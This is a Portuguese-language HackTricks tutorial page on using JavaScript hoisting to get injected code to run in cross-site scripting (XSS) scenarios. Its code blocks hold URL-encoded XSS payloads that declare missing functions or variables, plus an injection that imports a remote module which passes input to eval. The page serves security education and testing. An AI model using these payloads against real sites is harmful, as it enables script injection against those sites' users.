# Elevação de JS
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras maneiras de apoiar o HackTricks: * Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
## Informações Básicas Na linguagem JavaScript, um mecanismo conhecido como **Elevação** é descrito, onde declarações de variáveis, funções, classes ou imports são conceitualmente elevadas ao topo de seu escopo antes que o código seja executado. Esse processo é automaticamente realizado pelo mecanismo JavaScript, que percorre o script em várias passagens. Durante a primeira passagem, o mecanismo analisa o código em busca de erros de sintaxe e o transforma em uma árvore de sintaxe abstrata. Essa fase inclui a elevação, um processo onde certas declarações são movidas para o topo do contexto de execução. Se a fase de análise for bem-sucedida, indicando a ausência de erros de sintaxe, a execução do script prossegue. É crucial entender que: 1. O script deve estar livre de erros de sintaxe para que a execução ocorra. As regras de sintaxe devem ser estritamente seguidas. 2. A colocação do código dentro do script afeta a execução devido à elevação, embora o código executado possa diferir de sua representação textual. #### Tipos de Elevação Com base nas informações do MDN, existem quatro tipos distintos de elevação em JavaScript: 1. **Elevação de Valor**: Permite o uso do valor de uma variável dentro de seu escopo antes de sua linha de declaração. 2. **Elevação de Declaração**: Permite referenciar uma variável dentro de seu escopo antes de sua declaração sem causar um `ReferenceError`, mas o valor da variável será `undefined`. 3. Esse tipo altera o comportamento dentro de seu escopo devido à declaração da variável antes de sua linha de declaração real. 4. Os efeitos colaterais da declaração ocorrem antes que o restante do código que a contém seja avaliado. Detalhadamente, as declarações de função exibem o comportamento de elevação do tipo 1. A palavra-chave `var` demonstra o comportamento do tipo 2. Declarações léxicas, que incluem `let`, `const` e `class`, mostram o comportamento do tipo 3. Por fim, as declarações `import` são únicas, pois são elevadas com os comportamentos do tipo 1 e do tipo 4. ## Cenários Portanto, se você tiver cenários onde você pode **Injetar código JS depois que um objeto não declarado** é usado, você poderia **corrigir a sintaxe** declarando-o (para que seu código seja executado em vez de gerar um erro): ```javascript // The function vulnerableFunction is not defined vulnerableFunction('test', ''); // You can define it in your injection to execute JS //Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b '-alert(1)-''); function vulnerableFunction(a,b){return 1}; //Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1) test'); function vulnerableFunction(a,b){ return 1 };alert(1) ``` ```javascript // If a variable is not defined, you could define it in the injection // In the following example var a is not defined function myFunction(a,b){ return 1 }; myFunction(a, '') //Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b test'); var a = 1; alert(1); ``` ```javascript // If an undeclared class is used, you cannot declare it AFTER being used var variable = new unexploitableClass(); // But you can actually declare it as a function, being able to fix the syntax with something like: function unexploitableClass() { return 1; } alert(1); ``` ```javascript // Properties are not hoisted // So the following examples where the 'cookie' attribute doesn´t exist // cannot be fixed if you can only inject after that code: test.cookie('leo','INJECTION') test['cookie','injection'] ``` ## Mais Cenários ```javascript // Undeclared var accessing to an undeclared method x.y(1,INJECTION) // You can inject alert(1));function x(){}// // And execute the allert with (the alert is resolved before it's detected that the "y" is undefined x.y(1,alert(1));function x(){}//) ``` ```javascript // Undeclared var accessing 2 nested undeclared method x.y.z(1,INJECTION) // You can inject ");import {x} from "https://example.com/module.js"// // It will be executed x.y.z("alert(1)");import {x} from "https://example.com/module.js"//") // The imported module: // module.js var x = { y: { z: function(param) { eval(param); } } }; export { x }; ``` ```javascript // In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/ // It was injected the: let config;`-alert(1)`//` // With the goal of making in the block the var config be empty, so the return is not executed // And the same injection was replicated in the body URL to execute an alert try { if(config){ return; } // TODO handle missing config for: https://try-to-catch.glitch.me/"+` let config;`-alert(1)`//`+" } catch { fetch("/error", { method: "POST", body: { url:"https://try-to-catch.glitch.me/"+` let config;`-alert(1)-`//`+"" } }) } ``` ## Referências * [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios) * [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting) * [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.